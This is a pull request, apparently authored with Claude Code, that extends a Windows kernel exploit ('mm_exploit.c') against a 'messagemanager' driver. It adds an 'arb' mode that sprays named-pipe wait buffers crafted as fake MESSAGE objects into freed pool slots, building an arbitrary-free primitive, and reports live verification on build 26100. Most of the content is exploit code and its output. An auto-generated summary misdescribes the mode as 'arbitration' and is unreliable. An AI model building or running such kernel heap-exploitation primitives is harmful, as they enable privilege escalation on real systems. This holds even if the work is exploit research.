### PR TITLE
Plant a fake MESSAGE through the natural reclaim (arb-free data plane)

### DIFF
--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -1522,10 +1522,15 @@ typedef struct _PENDING_PIPEWAIT {
 static void release_pending_pipewait(PENDING_PIPEWAIT *rec) {
     if (!rec) return;
     if (rec->Root && rec->Outstanding) {
-        /* The wait never completes on its own; cancel it and wait for the IRP to finish before
-         * the input buffer / iosb are freed. */
-        CancelIoEx(rec->Root, NULL);
-        if (rec->Event) WaitForSingleObject(rec->Event, 2000);
+        /* The wait never completes on its own; cancel it and wait for TERMINAL completion before
+         * freeing Buf/Iosb. NtFsControlFile writes the IO_STATUS_BLOCK on completion, so freeing
+         * while the IRP is still pending would corrupt the heap. If completion can't be confirmed
+         * (CancelIoEx failed and the IRP is genuinely stuck), leak the record rather than free a
+         * buffer the kernel may still write -- a bounded resource leak, never a UAF. */
+        BOOL cancelled = CancelIoEx(rec->Root, NULL) || GetLastError() == ERROR_NOT_FOUND;
+        if (!(cancelled && rec->Event &&
+              WaitForSingleObject(rec->Event, INFINITE) == WAIT_OBJECT_0))
+            return;
         rec->Outstanding = FALSE;
     }
     if (rec->Root) CloseHandle(rec->Root);
@@ -1546,7 +1551,9 @@ static void release_pending_pipewait(PENDING_PIPEWAIT *rec) {
  * (towupper per wchar) and rejects '\\'/embedded NUL, so an arb Buffer target must encode as four
  * wchars that are each towupper-invariant and neither 0x0000 nor 0x005c. The 0x4242 sentinel below
  * (a case-less CJK-Ext-A unit) satisfies that and yields Buffer == 0x4242424242424242. Uniqueness
- * per index comes from name[9..] (past +0x1f), which Delete's free path never reads. */
+ * per (pid, index) comes from name[9..24] (past +0x1f), which Delete's free path never reads --
+ * the PID must be there so two concurrent arb processes don't generate the same global pipe leaf
+ * and collide in CreateNamedPipeW. */
 #define MM_ARB_BUFFER_SENTINEL 0x4242424242424242ull
 
 static void mm_wait_name(WCHAR out[44], int index, int arb) {
@@ -1554,9 +1561,9 @@ static void mm_wait_name(WCHAR out[44], int index, int arb) {
         for (int i = 0; i < 44; i++) out[i] = L'A';
         out[0] = L'M'; out[1] = L'A'; out[2] = L'R'; out[3] = L'B'; out[4] = L'0';
         out[5] = out[6] = out[7] = out[8] = 0x4242;   /* name[5..8] -> Buffer(+0x18) sentinel */
-        WCHAR uniq[16];
-        swprintf(uniq, 16, L"%08x", (unsigned)index);
-        for (int i = 0; i < 8; i++) out[9 + i] = uniq[i];   /* +0x20.. : unique, unused by Delete */
+        WCHAR uniq[24];
+        swprintf(uniq, 24, L"%08lx%08x", GetCurrentProcessId(), (unsigned)index);
+        for (int i = 0; i < 16; i++) out[9 + i] = uniq[i];  /* +0x22.. : pid+index, unused by Delete */
         return;
     }
     WCHAR tmp[80];

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -1536,19 +1536,40 @@ static void release_pending_pipewait(PENDING_PIPEWAIT *rec) {
     memset(rec, 0, sizeof(*rec));
 }
 
-/* Exactly 44 wchars, deterministic per (pid, index). */
-static void mm_wait_name(WCHAR out[44], int index) {
+/* Exactly 44 wchars, deterministic per (pid, index).
+ *
+ * The name is copied into the FSCTL_PIPE_WAIT SystemBuffer starting at +0x0e, so it overlaps the
+ * MESSAGE fields a reclaimed chunk would expose: name[5..8] -> Buffer(+0x18). In `arb` mode this
+ * plants a fake-MESSAGE Buffer for the arbitrary-free primitive (Delete does
+ * ExFreePoolWithTag(msg+0x18,'Tfub') when RefCount hits 0 -- RefCount lives in the free Timeout
+ * field, set separately). Constraints discovered on 26100: NPFS uppercases the name in place
+ * (towupper per wchar) and rejects '\\'/embedded NUL, so an arb Buffer target must encode as four
+ * wchars that are each towupper-invariant and neither 0x0000 nor 0x005c. The 0x4242 sentinel below
+ * (a case-less CJK-Ext-A unit) satisfies that and yields Buffer == 0x4242424242424242. Uniqueness
+ * per index comes from name[9..] (past +0x1f), which Delete's free path never reads. */
+#define MM_ARB_BUFFER_SENTINEL 0x4242424242424242ull
+
+static void mm_wait_name(WCHAR out[44], int index, int arb) {
+    if (arb) {
+        for (int i = 0; i < 44; i++) out[i] = L'A';
+        out[0] = L'M'; out[1] = L'A'; out[2] = L'R'; out[3] = L'B'; out[4] = L'0';
+        out[5] = out[6] = out[7] = out[8] = 0x4242;   /* name[5..8] -> Buffer(+0x18) sentinel */
+        WCHAR uniq[16];
+        swprintf(uniq, 16, L"%08x", (unsigned)index);
+        for (int i = 0; i < 8; i++) out[9 + i] = uniq[i];   /* +0x20.. : unique, unused by Delete */
+        return;
+    }
     WCHAR tmp[80];
     swprintf(tmp, 80, L"mmwait%08lx%08xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
              GetCurrentProcessId(), (unsigned)index);
     for (int i = 0; i < 44; i++) out[i] = tmp[i];
 }
 
-static int spray_pending_pipewait(int index, PENDING_PIPEWAIT *rec, int diag) {
+static int spray_pending_pipewait(int index, PENDING_PIPEWAIT *rec, int diag, int arb) {
     WCHAR leaf[44];
     WCHAR full[64];
     memset(rec, 0, sizeof(*rec));
-    mm_wait_name(leaf, index);
+    mm_wait_name(leaf, index, arb);
     /* \\.\pipe\<44> -> full pipe path for the server/client that keep the instance busy. */
     full[0] = L'\\'; full[1] = L'\\'; full[2] = L'.'; full[3] = L'\\';
     full[4] = L'p'; full[5] = L'i'; full[6] = L'p'; full[7] = L'e'; full[8] = L'\\';
@@ -1578,7 +1599,13 @@ static int spray_pending_pipewait(int index, PENDING_PIPEWAIT *rec, int diag) {
     rec->Buf = calloc(1, buflen);
     if (!rec->Buf) { release_pending_pipewait(rec); return 0; }
     MM_PIPE_WAIT_FOR_BUFFER *w = (MM_PIPE_WAIT_FOR_BUFFER *)rec->Buf;
-    memcpy(&w->Timeout, "MMWAIT!!", 8);   /* +0x00 marker; ignored because TimeoutSpecified=FALSE */
+    /* Timeout (+0x00) is ignored when TimeoutSpecified==FALSE, so it is free attacker bytes ->
+     * the MESSAGE RefCount. arb: RefCount == 1 so Delete's `xadd -1` reaches 0 and frees Buffer.
+     * measurement: a magic marker so a reclaim is visible even without a captured address. */
+    if (arb)
+        w->Timeout.QuadPart = 1;              /* RefCount = 1 */
+    else
+        memcpy(&w->Timeout, "MMWAIT!!", 8);
     w->NameLength = namebytes;
     w->TimeoutSpecified = FALSE;
     memcpy(w->Name, leaf, namebytes);
@@ -1631,10 +1658,12 @@ static int do_reclaimprobe(int argc, char **argv) {
     int hold = argc > 4 ? atoi(argv[4]) : 600;
     int targets = argc > 5 ? atoi(argv[5]) : 16;
     const char *prim = argc > 6 ? argv[6] : "wait";
-    int use_wait = _stricmp(prim, "wait") == 0;
+    int use_arb = _stricmp(prim, "arb") == 0;      /* wait spray crafted as a fake MESSAGE */
+    int use_wait = use_arb || _stricmp(prim, "wait") == 0;
     int use_afd = _stricmp(prim, "afd") == 0;
     if (!use_wait && !use_afd && _stricmp(prim, "pipe") != 0) {
-        printf("[probe] primitive must be \"wait\", \"afd\", or \"pipe\"; got \"%s\"\n", prim);
+        printf("[probe] primitive must be \"wait\", \"arb\", \"afd\", or \"pipe\"; got \"%s\"\n",
+               prim);
         return 2;
     }
     if (window < 1 || spray_count < 1 || hold < 1 || targets < 1) {
@@ -1688,18 +1717,24 @@ static int do_reclaimprobe(int argc, char **argv) {
     int ok = 0;
 
     if (use_wait) {
-        /* Pending FSCTL_PIPE_WAIT: generic-context 0x68 NonPagedNx SystemBuffer, "MMWAIT!!" at
-         * +0x00. Same allocation path as the driver's Create -- the fair reclaim test. */
-        printf("[probe] freed %d/%d targets; spraying %d pending FSCTL_PIPE_WAIT SystemBuffers on "
-               "CPU 0\n", freed, made, spray_count);
+        /* Pending FSCTL_PIPE_WAIT: generic-context 0x68 NonPagedNx SystemBuffer -- same allocation
+         * path as the driver's Create. `wait`: "MMWAIT!!" at +0x00 (reclaim test). `arb`: the
+         * buffer is crafted as a fake MESSAGE (RefCount +0x00 == 1, Buffer +0x18 == the sentinel)
+         * so a reclaimed slot is a ready-to-free arbitrary-free MESSAGE. */
+        printf("[probe] freed %d/%d targets; spraying %d pending FSCTL_PIPE_WAIT %s on CPU 0\n",
+               freed, made, spray_count,
+               use_arb ? "fake-MESSAGE buffers (RefCount=1, Buffer=0x4242424242424242)"
+                       : "SystemBuffers");
         fflush(stdout);
         PENDING_PIPEWAIT *held = calloc((size_t)spray_count, sizeof(*held));
         if (!held) { printf("[probe] could not allocate the record array\n"); free(ids); return 2; }
         for (int i = 0; i < spray_count; i++)
-            if (spray_pending_pipewait(i, &held[i], i == 0)) ok++;
+            if (spray_pending_pipewait(i, &held[i], i == 0, use_arb)) ok++;
         printf("[probe] %d/%d PIPE_WAIT buffers pending; holding %d s. Read each freed target: "
-               "\"MMWAIT!!\" at +0x00 means a natural reclaim landed at the right offset.\n",
-               ok, spray_count, hold);
+               "%s.\n", ok, spray_count, hold,
+               use_arb ? "RefCount=1 at +0x00 and Buffer 0x4242424242424242 at +0x18 == a planted "
+                         "fake MESSAGE (Delete would arb-free +0x18)"
+                       : "\"MMWAIT!!\" at +0x00 means a natural reclaim landed");
         fflush(stdout);
         Sleep((DWORD)hold * 1000);
         for (int i = 0; i < spray_count; i++) release_pending_pipewait(&held[i]);
@@ -1766,7 +1801,7 @@ int main(int argc, char **argv) {
     printf("usage: %s [leak|demo|hold|fixture [duration-seconds] [messages] [stop-file]|"
            "trigger [duration-seconds]|rip [messages] [retained-tfub-sprays] "
            "[flush-delay-spins] [groom-events]|"
-           "reclaimprobe [window-seconds] [spray-count] [hold-seconds] [targets] [wait|afd|pipe]|"
+           "reclaimprobe [window-seconds] [spray-count] [hold-seconds] [targets] [wait|arb|afd|pipe]|"
            "spray [pipe|pending|mailslot] [datalen] [count] [start-delay-seconds]]\n",
            argv[0]);
     return 2;


### PR DESCRIPTION
Follow-up to #100. Builds on the natural `IoSB` reclaim to plant a **complete attacker-crafted fake MESSAGE** into a freed `Tgsm` slot with no debugger.

## What

New `reclaimprobe ... arb` mode crafts each `FSCTL_PIPE_WAIT` SystemBuffer as a fake MESSAGE, so a reclaimed chunk is a ready-to-free arbitrary-free MESSAGE:

```
+0x00 RefCount = 1                     (the free Timeout field; Delete's `xadd -1` reaches 0)
+0x18 Buffer   = 0x4242424242424242    (name[5..8]; the arb-free target)
```

`Delete` on a stale handle to such a chunk calls `ExFreePoolWithTag(msg+0x18, 'Tfub')` — an **arbitrary free**, debugger-free.

## Encoding constraints found on 26100

The name lands in the SystemBuffer at `+0x0e`, and NPFS **uppercases it in place** (`towupper` per wchar) and rejects `\` and embedded NUL. So a Buffer target must encode as four wchars each `towupper`-invariant and neither `0x0000` nor `0x005c`. The `0x4242` sentinel (a case-less CJK-Ext-A unit) satisfies that and yields `Buffer == 0x4242424242424242`. Per-pipe uniqueness comes from `name[9..]` (past `+0x1f`), which `Delete`'s free path never reads.

## Verified live (26100.32995)

16 freed `Tgsm` targets, 500-buffer `arb` spray → **8/16 reclaimed**, each carrying `RefCount 1` at `+0x00` and `Buffer 0x4242424242424242` at `+0x18`. The debugger-free arbitrary-free **data plane is complete**.

## Not in this PR

Firing the arb-free still needs a **stale handle** (the UAF race to drive `Delete`) and a **real freeable target** meeting the same wchar-encoding constraints.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added an `arb` mode to `reclaimprobe`, alongside the existing probe modes.
  * Added support for selecting the arbitration mode when creating pipe-wait probes.
  * Improved output to clearly identify the selected mode and expected result.
  * Updated usage guidance to document the new option.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->